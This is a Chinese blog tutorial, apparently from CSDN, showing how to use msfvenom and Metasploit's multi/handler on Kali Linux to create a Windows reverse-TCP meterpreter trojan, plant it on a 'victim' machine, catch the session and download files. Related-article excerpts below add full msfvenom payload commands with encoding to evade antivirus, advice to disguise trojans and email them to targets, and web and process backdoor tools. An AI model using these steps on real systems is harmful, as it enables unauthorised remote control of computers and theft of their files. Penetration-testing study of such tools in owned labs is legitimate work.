kali Linux生成Windows后门

已于 2023-12-11 17:07:23 修改
阅读量878 收藏 2
点赞数
文章标签: linux 运维 服务器
于 2022-04-24 14:29:32 首次发布
原文链接:https://blog.csdn.net/weixin_42514162/article/details/109438059?ops_request_misc=%257B%2522request%255Fid%2522%253A%2522165078165116781683936269%2522%252C%2522scm%2522%253A%252220140713.130102334.pc%255Fall.%2522%257D&request_id=165078165116781683936269&b
版权

 

教程开始:

Kali是一个强大系统,有很多的工具可以用来进行渗透。今天,介绍自己的初始的一个新手木马。

  • 首先,查看一下工具msfvenom的功能参数吧。
  • msfvenom

     查看功能模块

  • msfvenom -l payloads

  •  然后,使用工具msfvenom来生成后门木马,这个是专业的创建木马后门的工具。命令如下:

  • 生成了木马shell.exe,顺便一提lhost(localhost)和lport要设置为你的IP和你打算使用的端口。

  • 之后,把木马复制到另一台受害的机器,Windows系统中,但是先别执行,在kali中继续输入,如下代码:
  • msfconsole

    之后,输入

  • msf5 > use exploit/multi/handler
msf5 exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp 
payload => windows/meterpreter/reverse_tcp
msf5 exploit(multi/handler) > set lhost 192.168.79.3
lhost => 192.168.79.3
msf5 exploit(multi/handler) > set lport 2333
lport => 2333
msf5 exploit(multi/handler) > exploit

    好了,执行Windows下的木马。结果如下

  •  可以随意操作这个Windows的文件。比如使用,下载功能,

  • download test.txt

     输入?,查看更多命令

KM_
关注
kali的学习笔记篇(七)metasploit之PC后门
Kind&红衣的博客
08-12 1167
//生成后门 //参数可参照第五篇文章:PC渗透参数集 msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -i 5 LHOST=192.168.1.113 LPORT=55555 -f exe > /root/muma.exe //选择模块 use exploit/multi/handler //装载攻击载...
Kali渗透测试-远程控制:6200端口变成“后门
Liu_Bruce的博客
05-06 3109
Kali渗透测试-远程控制:6200端口变成“后门” 测试环境 攻击机:Linux kali 5.16.0-kali7-amd64 (IP:192.168.68.248) 靶机:Metasploitable2 - Linux (IP:192.168.68.205) 攻击工具:Netcat(nc) “瑞士军刀” 扫描工具:Nmap version 7.92 漏洞是黑客进入计算机的入口,如果目标主机上运行的vsftpd-2.3.4被黑客使用笑脸漏洞成功渗透,就会自动在6200
kali自带软件作用docx
03-21
kali自带软件作用docx
里应外合:Linux下的后门和日志工具(ZT)
tianyu的专栏 - Linux site:blog.csdn.net/wishfly
03-04 1326
攻入Linux系统后,很多入侵者往往就开始得意忘形了。这其中还有一个原因,就是技术性也要求更高了。下面,我们来看看一些常用的经典工具。  1、从这里延伸:后门和连接工具  (1)Httptunnel  Tunnel的意思是隧道,通常HTTPTunnel被称之为HTTP暗道,它的原理就是将数据伪装成HTTP的数据形式来穿过防火墙,实际上,它是在HTTP请求中创建了一个双向的虚拟数据连接来穿透防火墙。
kali生成web端后门
weixin_34397291的博客
12-07 816
  很多时候在***测试时选择web***害怕用的别人的马带有后门,这样自己的辛苦就要被别人不劳而获,很多时候我们都想拥有自己的马,那么这个时候你就应该使用kail来生成一个自己独特密码的web***了。 Kali Linux自带有好几个web***生成工具,下面我们来简单看几个:1.webacoo后门webacoo  -g -o test.php-g 制作后门代码-o 输出生成指定的后门程序文件...
Kali 2.0 Web后门工具----WebaCoo、weevely、PHP Meterpreter
weixin_30814223的博客
11-10 574
注:以下内容仅供学习使用,其他行为均与作者无关!转载请注明出处,谢谢! 本文将介绍 Kali 2.0 版本下的三款Web后门工具:WebaCoo、weevely、PHP Meterpreter,这类工具通常用于维护控制权。 实验环境: ● KALI 的IP地址是192.168.44.138; ● Metasploit的IP地址是192.168.44.130 ; 一、 WeBaCoo WeBaCoo...
Kali LinuxWindows7 x64 植入后门
m0_50917178的博客
04-11 1929
声明:本文章内所有内容环境为自己搭建绝无违法内容,禁止利用其中的技术来做违法的事情。 主要内容: **1.利用msf生成后门,并上传到目标主机上 2.介绍获得权限可以做的某些事情 3.查看并提高现有权限 4.创建账户,并将其加入管理组 5.开启远程桌面** 第一步:利用msf生成后门,并上传到目标主机上 msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.16.128 lport=5555 -f exe -o /home/rockrock
Kali实现msfvenom在WindowsLinux靶机下后门漏洞
weixin_43287317的博客
03-28 6065
Kali实现msfvenom在WindowsLinux靶机下后门漏洞
Kali Linux渗透测试小实践——Metasploit与后门木马
PICACHU+++的博客
01-08 2904
Metasploit是一款开源的安全漏洞检测工具,可以帮助安全和IT专业人士识别安全性问题,验证漏洞的缓解措施,并管理专家驱动的安全性进行评估,提供真正的安全风险情报。这些功能包括智能开发,代码审计,Web应用程序扫描,社会工程。团队合作,在Metasploit和综合报告提出了他们的发现。
Kali Linux远程控制
qq_71207842的博客
06-12 2369
如果可以选择的话,你觉得黑客最希望对目标系统做些什么呢? 1、让目标系统上的服务崩溃。 2、在目标系统上执行某个程序。 3、直接控制目标系统。 是不是第3个选择是最激动人心的呢?
25000Linux集群完整版去后门生成器.rar
10-11
25000Linux集群完整版去后门生成
kali linux捉肉鸡教程,使用Kali中的Metasploit生成木马控制Windows系统
weixin_42309178的博客
05-02 1512
一、概念:Kali基于debin的数字取证系统,上面集成了很多渗透测试工具,其前身是BT5 R3(BtackTrack)。其中Metasploit是一个综合利用工具,极大的提高了攻击者的渗透效率,使用Ruby开发的,使用非常方便,进入该工具的方式:msfconsole ,MSF依赖于Postgresql数据库,在使用MSF之前要开启数据库。二、步骤:Step1:生成木马,msfvenommsfve...
Kali Linux之常见后门工具介绍
weixin_34061042的博客
02-26 1890
1、Meterpreter 它是Metasploit框架中功能强大的后渗透模块。可以通过Meterpreter的客户端执行攻击脚本,远程调用目标主机上运行的Meterpreter服务端。 命令        作用 sessions     查看会话ID信息 idletime     显示目标主机截止当前无操作命令的时间 webcam_snap  抓取目标主机的摄像头,将拍摄的内容保存...
linux 系统使用 cymothoa 添加后门
发哥微课堂
01-27 2919
0x00:介绍 cymothoa 是一个后门工具,利用代码 shellcode 会被注入到进程中,只要进程存在,后门就会有效,所以一般选择一些自其服务的进程来注入,例如 web 服务 mysql,apache 等。其后门所拥有的权限和注入的进程权限是相同的。当拿下目标 shell 后就可以使用 cymothoa 添加后门了。 0x01:使用 首先已经有了一个机器的 shell,我这里是 me...
利用msfvenom生产windows后门
shy的博客
11-05 2050
原理: 利用msfvenom制作shy .exe 文件,然后发送到靶机上面,运行后就可以在kali linux 上面利用msfconsole连接msfvenom服务控制靶机 1,根据靶机操作系统,搜索适合的生产后门文件的脚本 msfvenom -l | grep windows | grep x64 | grep tcp 2,选择生产脚本,生产后门文件 -p 选择一个payloa...
渗透工具——kali中msf(后门生成模块msfvenom)
最新发布
2301_78006725的博客
09-02 782
3. 通过邮件等方式上传到目标电脑,让目标电脑点击这个木马时,木马会在目标电脑后台运行(我这里就先用本机做一下试验)5. 然后run运行,同时点击桌面上的exe文件(不会出现画面,后进入后台运行)然后use exploit/multi/handler。成功拿到会话,就证明木马没问题,就可以进行操作啦!2. 点击文件管理,在root中查看是否已经生成完毕。show options完善信息。列出所有可用的payload;1. 生成shell
Kali利用metasploit 生成后门程序,操作目标主机cmd
qq_19641369的博客
11-27 4647
一.利用命令生成后门程序 msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.52.133 LPORT=443 -f exe -o met.exe LHOST:表示本机地址 -f :表示生成程序的后缀 met:文件名 可以自定义 把生成exe文件发送给目标主机执行,注意记得伪装下否则会被杀毒软件识别,我这里是利用打包命令将其打包,然后发送到目标主机执行。 二.msfconsole 命令打开控制台 root@...
后门
蓝法典的专栏
02-28 1131
Mix老装一幅正人君子的样子,说写文档,哼哼。。。。无聊,cmd /?后看见好多东西,其中有个好玩的: ******************* 如果 /D 未在命令行上被指定,当 CMD.EXE 开始时,它会寻找 以下 REG_SZ/REG_EXPAND_SZ 注册表变量。如果其中一个或 两个都存在,这两个变量会先被执行。 HKEY_LOCAL_MACHINE/Software/Microsoft
kali linux 生成后门文件命令:PHP,java,Linuxwindows,android
lilywang20119的博客
11-13 3846
生成后门文件: 在这里需要用到一个命令:msfvenom 在Kali的终端这种直接输入msfvenom -h就可以查看相关的参数信息。 下面示例的参数的解释直接通过-h参数查看就好,在下面就不再做多的说明了。 Windows后门: [plain] view plain copy msfvenom -p wind
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值